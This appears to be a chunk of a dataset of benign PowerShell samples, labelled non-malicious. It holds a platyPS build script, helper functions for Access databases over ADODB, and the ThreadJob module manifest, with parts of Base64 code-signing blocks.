FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxh # bmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjo4 # NkRGLTRCQkMtOTMzNTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2Vy # dmljZaIjCgEBMAcGBSsOAwIaAxUANiNHGWXbNaDPxnyiDbEOciSjFhCggYMwgYCk # fjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIF # AOnJRdwwIhgPMjAyNDA0MTcwMjQ1NDhaGA8yMDI0MDQxODAyNDU0OFowdDA6Bgor # BgEEAYRZCgQBMSwwKjAKAgUA6clF3AIBADAHAgEAAgIHyTAHAgEAAgISuzAKAgUA # 6cqXXAIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIBAAID # B6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GBAALa47B008Gj/WlPeFRf # Zy5y11xY5b2qWtqT6WMLEh4d650CDSWJ2/Ei5r1oRCUp9f8ffoxJyzLDm6NEBvnP # 4UVGaBE5WK8W8g68Gk7dpmOcHt4zCP3ylEQLQFLIXQzFCHOrQLW+ArYPhrdzYyH6 # T0zJV04knCFIBFLSSjMDmB2vMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUt # U3RhbXAgUENBIDIwMTACEzMAAAHdXVcdldStqhsAAQAAAd0wDQYJYIZIAWUDBAIB # BQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQx # IgQgzd5vxyeSzVc7bb2F8iI7tMaNiVJLealdMwtm37ALG/owgfoGCyqGSIb3DQEJ # EAIvMYHqMIHnMIHkMIG9BCBh/w4tmmWsT3iZnHtH0Vk37UCN02lRxY+RiON6wDFj # ZjCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw # DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x # JjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB3V1X # HZXUraobAAEAAAHdMCIEIGrL99szCpBl7kSgVwTECzsJphQbtoULSl0lrbArOjvN # MA0GCSqGSIb3DQEBCwUABIICAKa5sLfXxu9VhryPH7pXEJ+ZcEaO7vZkJwj8oqn5 # DN+eauUqhcKDXZNMxCgvirBMAtsA5fvwt+cg3drLWYuqnQ4e/X9PD03cSs5MQ132 # OnuGYU8pE1TdEWpma43wiZaiN8Q39zYH4yT8eifUhzwIHmB49KEd/YKwaR8Q5Zx/ # rhb64yo/Jp9hC7hO1DI90ew1L0LCRtFr6v0juoPbafoEAEedsMLoWzr4WU4UuoVv # 6PMPOKa3weyZRii+dBqQHQrBYAZW5jZz7yDqGUyxn3ZSRD/liyJeCR9kZB73Khxw # XSlNxBvDjOam1e37ov5JzPYQesaOJqXzU1NFcRMzLroOj2Dh2MDN2RgtvvGLJn06 # DsV+AZKix3514hURnq/aS14H6KRS1ojYK3+2j47cAerapRfvdDrXiQLTWRsvJe4k # MRTPf/MjRxaeWdg2ltrtSeP3IcuYIOhlfnKAAiJ1ckNVe2U/29ypuOJmrQ0mwepv # +g5vFXuwxqYqif5QI8bav0OAHgX3h7+zvsnXvodx6iiZtZxaztNCNdGtXAsjZNAJ # PpBjzQneNIRJeVkwZlZMAmGjov/ZXhB14MlZbwlxz6Prql2j2/UrW6aiResoZpmi # C/usS/aDofiy/AEe9ztUijrqf+ThLF72mioqkT17quw0Du88r28WJvQmDjY0BVD+ # zaW0 # SIG # End signature block
combined_dataset/train/non-malicious/1533.ps1
1533.ps1
[CmdletBinding()] param( [ValidateSet('Debug', 'Release')] $Configuration = "Debug", [switch]$SkipDocs, [string]$DotnetCli ) function Find-DotnetCli() { [string] $DotnetCli = '' $dotnetCmd = Get-Command dotnet return $dotnetCmd.Path } if (-not $DotnetCli) { $DotnetCli = Find-DotnetCli } if (-not $DotnetCli) { throw "dotnet cli is not found in PATH, install it from https://docs.microsoft.com/en-us/dotnet/core/tools" } else { Write-Host "Using dotnet from $DotnetCli" } if (Get-Variable -Name IsCoreClr -ValueOnly -ErrorAction SilentlyContinue) { $framework = 'netstandard1.6' } else { $framework = 'net451' } & $DotnetCli publish ./src/Markdown.MAML -f $framework --output=$pwd/publish /p:Configuration=$Configuration $assemblyPaths = ( (Resolve-Path "publish/Markdown.MAML.dll").Path, (Resolve-Path "publish/YamlDotNet.dll").Path ) New-Item -Type Directory out -ErrorAction SilentlyContinue > $null Copy-Item -Rec -Force src\platyPS out foreach($assemblyPath in $assemblyPaths) { $assemblyFileName = [System.IO.Path]::GetFileName($assemblyPath) $outputPath = "out\platyPS\$assemblyFileName" if ((-not (Test-Path $outputPath)) -or (Test-Path $outputPath -OlderThan (Get-ChildItem $assemblyPath).LastWriteTime)) { Copy-Item $assemblyPath out\platyPS } else { Write-Host -Foreground Yellow "Skip $assemblyFileName copying" } } Copy-Item .\platyPS.schema.md out\platyPS New-Item -Type Directory out\platyPS\docs -ErrorAction SilentlyContinue > $null Copy-Item .\docs\* out\platyPS\docs\ New-Item -Type Directory out\platyPS\templates -ErrorAction SilentlyContinue > $null Copy-Item .\templates\* out\platyPS\templates\ if ($env:APPVEYOR_REPO_TAG_NAME) { $manifest = cat -raw out\platyPS\platyPS.psd1 $manifest = $manifest -replace "ModuleVersion = '0.0.1'", "ModuleVersion = '$($env:APPVEYOR_REPO_TAG_NAME)'" Set-Content -Value $manifest -Path out\platyPS\platyPS.psd1 -Encoding Ascii } Remove-Module platyPS -ErrorAction SilentlyContinue Import-Module $pwd\out\platyPS if (-not $SkipDocs) { New-ExternalHelp docs -OutputPath out\platyPS\en-US -Force Import-Module $pwd\out\platyPS -Force }
combined_dataset/train/non-malicious/Connect-AccessDB_2.ps1
Connect-AccessDB_2.ps1
# Functions for connecting to and working with Access databases # Matt Wilson # May 2009 function Connect-AccessDB ($global:dbFilePath) { # Test to ensure valid path to database file was supplied if (-not (Test-Path $dbFilePath)) { Write-Error "Invalid Access database path specified. Please supply full absolute path to database file!" } # TO-DO: Add check to ensure file is either MDB or ACCDB # Create a new ADO DB connection COM object, which will give us useful methods & properties such as "Execute"! $global:AccessConnection = New-Object -ComObject ADODB.Connection # Actually open the database so we can start working with its contents # Access 00-03 (MDB) format has a different connection string than 2007 if ((Split-Path $dbFilePath -Leaf) -match [regex]"\\.mdb$") { Write-Host "Access 2000-2003 format (MDB) detected! Using Microsoft.Jet.OLEDB.4.0." $AccessConnection.Open("Provider = Microsoft.Jet.OLEDB.4.0; Data Source= $dbFilePath") } # Here's the check for if 2007 connection is necessary if ((Split-Path $dbFilePath -Leaf) -match [regex]"\\.accdb$") { Write-Host "Access 2007 format (ACCDB) detected! Using Microsoft.Ace.OLEDB.12.0." $AccessConnection.Open("Provider = Microsoft.Ace.OLEDB.12.0; Persist Security Info = False; Data Source= $dbFilePath") } } function Open-AccessRecordSet ($global:SqlQuery) { # Ensure SQL query isn't null if ($SqlQuery.length -lt 1) { Throw "Please supply a SQL query for the recordset selection!" } # Variables used for the connection itself. Leave alone unless you know what you're doing. $adOpenStatic = 3 $adLockOptimistic = 3 # Create the recordset object using the ADO DB COM object $global:AccessRecordSet = New-Object -ComObject ADODB.Recordset # Finally, go and get some records from the DB! $AccessRecordSet.Open($SqlQuery, $AccessConnection, $adOpenStatic, $adLockOptimistic) } function Get-AccessRecordSetStructure { # TO-DO: Should probably test to ensure valid $accessRecordSet exists & has records # Cycle through the fields in the recordset, but only pull out the properties we care about @@ return $AccessRecordSet.Fields | Select-Object Name,Attributes,DefinedSize,type } function Convert-AccessRecordSetToPSObject { # TO-DO: Should probably test to ensure valid $accessRecordSet exists & has records # Get an array of field names which we will later use to create custom PoSh object names $fields = Get-AccessRecordSetStructure # Move to the very first record in the RecordSet before cycling through each one $AccessRecordSet.MoveFirst() # Cycle through each RECORD in the set and create that record to an object do { # Create a SINGLE blank object we can use in a minute to add properties/values to $record = New-Object System.Object # For every FIELD in the DB, lookup the CURRENT value of that field and add a new PoSh object property with that name and value foreach ($field in $fields) { $fieldName = $field.Name # This makes working with the name a LOT easier in Write-Host, etc. #Write-Host "Working with field: $fieldName" #Write-Host "Preparing to set value to: $($AccessRecordset.Fields.Item($fieldName).Value)" $record | Add-Member -type NoteProperty -name $fieldName -value $AccessRecordSet.Fields.Item($fieldName).Value } # Output the custom object we just created Write-Output $record # Tell the recordset to advance forward one before doing this again with another object $AccessRecordset.MoveNext() } until ($AccessRecordset.EOF -eq $True) } function Execute-AccessSQLStatement ($query) { $AccessConnection.Execute($query) } function Convert-AccessTypeCode ([string]$typeCode) { # Build some lookup tables for our Access type codes so we can convert values pretty easily $labelLookupHash = @{"AutoNumber"="3"; "Text"="202"; "Memo"="203"; "Date/Time"="7"; "Currency"="6"; "Yes/No"="11"; "OLE Object"="205"; "Byte"="17"; "Integer"="2"; "Long Integer"="3"; "Single"="4"; "Double"="5"} $codeLookupHash = @{"3"="AutoNumber"; "202"="Text"; "203"="Memo"; "7"="Date/Time"; "6"="Currency"; "11"="Yes/No"; "205"="OLE Object"; "17"="Byte"; "2"="Integer"; "3"="Long Integer"; "4"="Single"; "5"="Double"} # Convert a value depending on what type of data was supplied if ($typeCode -match [regex]"^\\d{1,3}$") { $valueFound = $codeLookupHash.$typeCode if ($valueFound) { Write-Output $valueFound } else { Write-Output "Unknown" } } else { $valueFound = $labelLookupHash.$typeCode if ($valueFound) { Write-Output $valueFound } else { Write-Output "Unknown" } } } function Close-AccessRecordSet { $AccessRecordSet.Close() } function Disconnect-AccessDB { $AccessConnection.Close() } # Connect-AccessDB "C:\\fso\\ConfigurationMaintenance.accdb" # Open-AccessRecordSet "SELECT * FROM printers" # $printersDB = Convert-AccessRecordSetToPSObject | Select-Object caption,driverName | Format-Table -AutoSize; $printersDB # Close-AccessRecordSet # Disconnect-AccessDB
combined_dataset/train/non-malicious/sample_56_33.ps1
sample_56_33.ps1
# # Module manifest for module 'ThreadJob' # @{ # Script module or binary module file associated with this manifest. RootModule = '.\Microsoft.PowerShell.ThreadJob.dll' # Version number of this module. ModuleVersion = '2.0.3' # ID used to uniquely identify this module GUID = '0e7b895d-2fec-43f7-8cae-11e8d16f6e40' Author = 'Microsoft Corporation' CompanyName = 'Microsoft Corporation' Copyright = '(c) Microsoft Corporation. All rights reserved.' # Description of the functionality provided by this module Description = " PowerShell's built-in BackgroundJob jobs (Start-Job) are run in separate processes on the local machine. They provide excellent isolation but are resource heavy. Running hundreds of BackgroundJob jobs can quickly absorb system resources. This module extends the existing PowerShell BackgroundJob to include a new thread based ThreadJob job. This is a lighter weight solution for running concurrent PowerShell scripts that works within the existing PowerShell job infrastructure. ThreadJob jobs will tend to run quicker because there is lower overhead and they do not use the remoting serialization system. And they will use up fewer system resources. In addition output objects returned from the job will be 'live' since they are not re-hydrated from the serialization system. However, there is less isolation. If one ThreadJob job crashes the process then all ThreadJob jobs running in that process will be terminated. This module exports a single cmdlet, Start-ThreadJob, which works similarly to the existing Start-Job cmdlet. The main difference is that the jobs which are created run in separate threads within the local process. One difference is that ThreadJob jobs support a ThrottleLimit parameter to limit the number of running jobs, and thus active threads, at a time. If more jobs are started then they go into a queue and wait until the current number of jobs drops below the throttle limit. Source for this module is at GitHub. Please submit any issues there. https://github.com/PaulHigin/PSThreadJob Added Runspace cleanup. Added Using variable expression support. Added StreamingHost parameter to stream host data writes to a provided host object. Added Information stream handling. Bumped version to 2.0.0, and now only support PowerShell version 5.1 and higher. Fixed using keyword bug with PowerShell preview version, and removed unneeded version check. Added setting current working directory to running jobs, when available. Added help URI to module. " # Minimum version of the Windows PowerShell engine required by this module PowerShellVersion = '5.1' # Cmdlets to export from this module CmdletsToExport = 'Start-ThreadJob' HelpInfoURI = 'https://go.microsoft.com/fwlink/?linkid=2113345' } # SIG # Begin signature block # MIInvwYJKoZIhvcNAQcCoIInsDCCJ6wCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCCv4Sy4df4Y/sf/ # 4d7im71N8tCny9H0XszagzRNoGf2raCCDXYwggX0MIID3KADAgECAhMzAAADrzBA # DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA # hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG # 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN # xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL # go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB # tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd # mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ # 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY # 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp # XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn # TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT # e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG # OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O # PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk # ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx # HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt # CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGZ8wghmbAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIHladHYi2lfI6orS+P2p3tLX # iHwb+pI1x7mEwA8VwGMTMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAJWsEdgQFLu/2/K+184cobDXbEG4Y19OmmCi/9yJ9wRcZI3/yo/WEkszZ # 5F0/vO1SzwRn9jVdB4d5pVGvtS0URM0derfF5by/6BjOfC/5+akaJHGCDcrc17NW # REWk3pYekLB/p+mqeYhBEs3gZVg5JZEWU2ILRMwefOF5TCqoEeTFWzlgjKnGCuP9 # i/FvE0bX9uLLu4DwOm5burC4tyh9fzoNotra/1DWjxprUcqYYOCaE4NptRLnaXXO # PGo3grd9JV1finlqFozCy6ErWgxvk/gM0SvDhHhD5yrUopK9E5OfsP0vL13VrSEF # sbwrizX4ZRGbzNfU4BTB7Y4WbXdFnKGCFykwghclBgorBgEEAYI3AwMBMYIXFTCC # FxEGCSqGSIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFZBgsq # hkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCDd9gvLTyCQTEweHSyAt7WPYvHCYcHot091/jFuDkcHsAIGZlcX119M # GBMyMDI0MDYxNzIyMTQzMC44NTJaMASAAgH0oIHYpIHVMIHSMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl # bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNO # OjhENDEtNEJGNy1CM0I3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT # ZXJ2aWNloIIReDCCBycwggUPoAMCAQICEzMAAAHj372bmhxogyIAAQAAAeMwDQYJ # KoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcNMjMx # MDEyMTkwNzI5WhcNMjUwMTEwMTkwNzI5WjCB0jELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3Bl # cmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjo4RDQxLTRC # RjctQjNCNzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCC # AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAL6kDWgeRp+fxSBUD6N/yuEJ # pXggzBeNG5KB8M9AbIWeEokJgOghlMg8JmqkNsB4Wl1NEXR7cL6vlPCsWGLMhyqm # scQu36/8h2bx6TU4M8dVZEd6V4U+l9gpte+VF91kOI35fOqJ6eQDMwSBQ5c9ElPF # UijTA7zV7Y5PRYrS4FL9p494TidCpBEH5N6AO5u8wNA/jKO94Zkfjgu7sLF8SUdr # c1GRNEk2F91L3pxR+32FsuQTZi8hqtrFpEORxbySgiQBP3cH7fPleN1NynhMRf6T # 7XC1L0PRyKy9MZ6TBWru2HeWivkxIue1nLQb/O/n0j2QVd42Zf0ArXB/Vq54gQ8J # IvUH0cbvyWM8PomhFi6q2F7he43jhrxyvn1Xi1pwHOVsbH26YxDKTWxl20hfQLdz # z4RVTo8cFRMdQCxlKkSnocPWqfV/4H5APSPXk0r8Cc/cMmva3g4EvupF4ErbSO0U # NnCRv7UDxlSGiwiGkmny53mqtAZ7NLePhFtwfxp6ATIojl8JXjr3+bnQWUCDCd5O # ap54fGeGYU8KxOohmz604BgT14e3sRWABpW+oXYSCyFQ3SZQ3/LNTVby9ENsuEh2 # UIQKWU7lv7chrBrHCDw0jM+WwOjYUS7YxMAhaSyOahpbudALvRUXpQhELFoO6tOx # /66hzqgjSTOEY3pu46BFAgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQUsa4NZr41Fbeh # Z8Y+ep2m2YiYqQMwHwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYD # VR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j # cmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwG # CCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIw # MjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcD # CDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBALe+my6p1NPMEW1t # 70a8Y2hGxj6siDSulGAs4UxmkfzxMAic4j0+GTPbHxk193mQ0FRPa9dtbRbaezV0 # GLkEsUWTGF2tP6WsDdl5/lD4wUQ76ArFOencCpK5svE0sO0FyhrJHZxMLCOclvd6 # vAIPOkZAYihBH/RXcxzbiliOCr//3w7REnsLuOp/7vlXJAsGzmJesBP/0ERqxjKu # dPWuBGz/qdRlJtOl5nv9NZkyLig4D5hy9p2Ec1zaotiLiHnJ9mlsJEcUDhYj8PnY # nJjjsCxv+yJzao2aUHiIQzMbFq+M08c8uBEf+s37YbZQ7XAFxwe2EVJAUwpWjmtJ # 3b3zSWTMmFWunFr2aLk6vVeS0u1MyEfEv+0bDk+N3jmsCwbLkM9FaDi7q2HtUn3z # 6k7AnETc28dAvLf/ioqUrVYTwBrbRH4XVFEvaIQ+i7esDQicWW1dCDA/J3xOoCEC # V68611jriajfdVg8o0Wp+FCg5CAUtslgOFuiYULgcxnqzkmP2i58ZEa0rm4LZymH # BzsIMU0yMmuVmAkYxbdEDi5XqlZIupPpqmD6/fLjD4ub0SEEttOpg0np0ra/MNCf # v/tVhJtz5wgiEIKX+s4akawLfY+16xDB64Nm0HoGs/Gy823ulIm4GyrUcpNZxnXv # E6OZMjI/V1AgSAg8U/heMWuZTWVUMIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJ # mQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # 